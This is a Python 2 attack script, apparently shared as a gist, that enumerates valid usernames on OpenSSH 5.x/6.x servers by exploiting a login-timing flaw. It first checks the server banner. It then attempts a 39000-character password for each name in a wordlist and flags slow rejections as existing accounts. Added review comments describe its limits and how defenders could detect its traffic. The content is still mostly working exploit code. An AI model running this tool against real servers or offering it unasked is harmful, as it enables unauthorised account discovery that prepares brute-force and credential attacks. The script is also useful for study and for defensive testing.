Created
August 24, 2016 21:08
OpenSSH Username enum
#!/usr/bin/python | |
# EDW - OpenSSH Username enum | |
import sys | |
import paramiko | |
import time | |
import optparse | |
import re | |
import signal | |
from socket import * | |
# Command-line interface. The parsed values are published as module-level
# names (host, user, port) that main() reads directly.
p = optparse.OptionParser("usage: %prog host user", version="%prog 0.2")
p.add_option(
    "-H", "--host",
    dest="host", type="string",
    help="specify hostname to run on",
)
p.add_option(
    "-u", "--userfile",
    dest="user", type="string",
    help="file of usernames",
)
p.add_option(
    "-p", "--port",
    dest="port", type="int", default=22,
    help="port number, default is 22",
)
options, args = p.parse_args()

# NOTE(review): neither --host nor --userfile is checked for presence, so a
# missing option reaches main() as None.
host = options.host
user = options.user  # despite the name, this is the PATH of the username list
port = options.port

# Fixed 39000-character password that main() submits on every login attempt.
# Seen from the server side, a password of this size on a failed login is an
# anomaly in its own right and a reasonable thing to alert on.
passw = 'A' * 39000
def main():
    """Check the server banner, then time one password login per listed name.

    Python 2 code. Reads the module-level ``host``, ``port``, ``user`` (path
    of a username list) and ``passw``.

    1. Opens a raw TCP connection, sends a fixed non-SSH string and reads up
       to 1024 bytes back. Unless that reply contains ``-OpenSSH_5`` or
       ``-OpenSSH_6`` the script prints a message and exits.
    2. Loads the username list, one name per line.
    3. For each name, attempts a paramiko password login with ``passw`` and
       prints one of two result lines depending on whether the rejection took
       more than 15 whole seconds.

    Review notes:
      * The banner test looks only at the major version in the reply. It says
        nothing about patch level or distribution backports, so "looks
        vulnerable" is a heuristic, not a finding.
      * Elapsed time is taken from ``int(time.time())`` (whole seconds) and
        compared with a fixed threshold, so network latency or server load
        can flip a result either way; the printed verdicts are unconfirmed.
      * Only ``paramiko.SSHException`` (and its ``BadAuthenticationType``
        subclass) is handled. A login that succeeds prints nothing, and a
        socket-level error propagates out of the loop.
      * What the target side sees: one connection that sends a non-SSH
        identification string (servers normally log this as a malformed
        client version), followed by one failed password login per list
        entry from the same source, each carrying a 39000-character
        password. Both are straightforward to alert on and to rate-limit.
    """
    # --- 1. banner probe over a plain TCP socket ---------------------------
    probe = socket(AF_INET, SOCK_STREAM)
    probe.connect((host, port))
    probe.send("Cymru_am_byth")
    banner = probe.recv(1024)
    shown = banner.rstrip()

    if re.search(r"-OpenSSH_(5|6)", banner):
        print "This version (%s) looks vulnerable, lets try......." % shown
        probe.close()
    else:
        print "This version (%s) is not vulnerable to the timing attack" % shown
        probe.close()
        exit()

    # --- 2. load the username list -----------------------------------------
    try:
        names = open(user).read().splitlines()
    except IOError as e:
        print "I/O error({0}): {1}".format(e.errno, e.strerror)
        sys.exit()

    # --- 3. one timed login attempt per name -------------------------------
    for name in names:
        try:
            client = paramiko.SSHClient()
            # AutoAddPolicy accepts whatever host key the server presents,
            # so the identity of the remote end is never verified.
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            tstart = int(time.time())
            client.connect(host, username=name, password=passw, port=port)
            client.close()
        except paramiko.BadAuthenticationType as e:
            # Server does not offer the attempted auth method at all: stop.
            print e
            sys.exit(1)
        except paramiko.SSHException as e:
            # Any other SSH-level failure (normally the rejected login) is
            # classified purely by how many whole seconds it took.
            elapsed = int(time.time()) - tstart
            if elapsed <= 15:
                print "User %s does not exist on %s - %i" % (name, host, elapsed)
            else:
                print "[*] User %s exists on %s - %i" % (name, host, elapsed)
def signal_handler(signal, frame):
    """SIGINT handler: print an abort notice and terminate the process.

    Both arguments are supplied by the ``signal`` machinery and are unused.
    The first parameter shadows the ``signal`` module inside this function,
    which is harmless here because the body never touches the module.
    """
    # Leading newline keeps the notice off the line where "^C" was echoed.
    print "\nCtrl+C pressed.. aborting..."
    exit()
# Script entry point: install the Ctrl+C handler first so that an interrupt
# during the (slow) timed login attempts exits with a short notice instead
# of a KeyboardInterrupt traceback.
if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)
    main()